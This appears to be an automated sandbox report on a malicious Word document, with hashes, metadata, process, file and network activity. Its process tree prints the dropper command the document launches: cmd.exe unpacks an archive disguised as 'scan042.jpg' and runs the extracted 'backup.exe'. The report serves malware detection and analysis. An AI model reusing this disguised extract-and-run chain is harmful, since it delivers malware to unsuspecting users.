File name: | 14bd1ab23d13543835821dd1fa5c17fc8c055341d09694971b5f2775c634f66e |
Full analysis: | https://app.any.run/tasks/570d97e5-4062-4e49-947d-941ec60de2a1 |
Verdict: | Malicious activity |
Analysis date: | December 06, 2018, 01:50:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 92B1C50C3DDF8289E85CBB7F8EEAD077 |
SHA1: | 2D22BF18AB1A8DB0309C477472B481B0641B9DC7 |
SHA256: | 14BD1AB23D13543835821DD1FA5C17FC8C055341D09694971B5F2775C634F66E |
SSDEEP: | 1536:KYC4876zcyODTKszH6momtNiNvHuz5wkNXxYm0H:K/yODTzza5uNi8zeiYtH |
.docx | | | Word Microsoft Office Open XML Format document (52.2) |
---|---|---|
.zip | | | Open Packaging Conventions container (38.8) |
.zip | | | ZIP compressed archive (8.8) |
AppVersion: | 15 |
---|---|
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 5383 |
LinksUpToDate: | No |
Company: | - |
TitlesOfParts: | - |
HeadingPairs: |
|
ScaleCrop: | No |
Paragraphs: | 10 |
Lines: | 38 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | 4589 |
Words: | 804 |
Pages: | 6 |
TotalEditTime: | 11 minutes |
Template: | Normal |
ModifyDate: | 2018:11:21 12:27:00Z |
CreateDate: | 2011:12:14 08:29:00Z |
RevisionNumber: | 4 |
LastModifiedBy: | 123 |
Creator: | tvkisdsy |
---|
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1981 |
ZipCompressedSize: | 424 |
ZipCRC: | 0x536c49fa |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3476 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\14bd1ab23d13543835821dd1fa5c17fc8c055341d09694971b5f2775c634f66e.docx" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 Modules
| |||||||||||||||
3352 | C:\WINDOWS\system32\cmd.exe /c set path=%ProgramFiles(x86)%\WinRAR;C:\Program Files\WinRAR; && cd /d %~dp0 & rar.exe e -o+ -r -inul *.rar scan042.jpg & rar.exe e -o+ -r -inul scan042.jpg backup.exe & backup.exe | C:\WINDOWS\system32\cmd.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
2148 | rar.exe e -o+ -r -inul *.rar scan042.jpg | C:\Program Files\WinRAR\Rar.exe | — | cmd.exe | |||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: Command line RAR Exit code: 10 Version: 5.60.0 Modules
| |||||||||||||||
3936 | rar.exe e -o+ -r -inul scan042.jpg backup.exe | C:\Program Files\WinRAR\Rar.exe | — | cmd.exe | |||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: Command line RAR Exit code: 10 Version: 5.60.0 Modules
|
PID | Process | Filename | Type | |
---|---|---|---|---|
3476 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA59A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3476 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3712D7A9.png | — | |
MD5:— | SHA256:— | |||
3476 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx | — | |
MD5:— | SHA256:— | |||
3476 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E7E6E214.wmf | — | |
MD5:— | SHA256:— | |||
3476 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\query[1].asmx | — | |
MD5:— | SHA256:— | |||
3476 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:C9005899C42F58E9E7C96DCB3A5EE8E3 | SHA256:BAAA4B86601B2CDBDAF8C9D3F3076A6A57EBB0E5FFD49CF53E039A90105750E4 | |||
3476 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\ShockwaveFlashObjects.exd | tlb | |
MD5:F6C15A27329445057C5B6AB13EFC17D9 | SHA256:ECBFE351ABFAC0B7A8BEB1453F55A23831A48A42A56E52337C3FE7B5E542DFB0 | |||
3476 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$bd1ab23d13543835821dd1fa5c17fc8c055341d09694971b5f2775c634f66e.docx | pgc | |
MD5:595FD57698395983926B7AA455D60454 | SHA256:35418F7818731C1F4D3E99F9D0268F480002B60DF0D17BA052B75BD3FE1D6615 | |||
3476 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol | sol | |
MD5:F4999DB3759C18E7BA192CA5EF6D97B7 | SHA256:2A3AD8B92932E61952C293C1076058ED31A2FA72F681F4418A10CFBCE0D2B279 | |||
3476 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\ONetConfig\b6419f5bc3093b5f22142ce454e02407.xml | xml | |
MD5:2D742EDCF8963F5A8F43845436647E30 | SHA256:703BFE4CF410D48CDD2854603E88FCC4DAB5483D1939A436E00A16B6F5B34659 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3476 | WINWORD.EXE | GET | 200 | 52.109.88.8:80 | http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033&App={019C826E-445A-4649-A5B0-0BF08FCC4EEE}&build=14.0.6023 | NL | xml | 1.99 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3476 | WINWORD.EXE | 52.109.8.27:443 | rr.office.microsoft.com | Microsoft Corporation | US | whitelisted |
3476 | WINWORD.EXE | 52.109.88.8:80 | office14client.microsoft.com | Microsoft Corporation | NL | whitelisted |
Domain | IP | Reputation |
---|---|---|
office14client.microsoft.com |
| whitelisted |
rr.office.microsoft.com |
| whitelisted |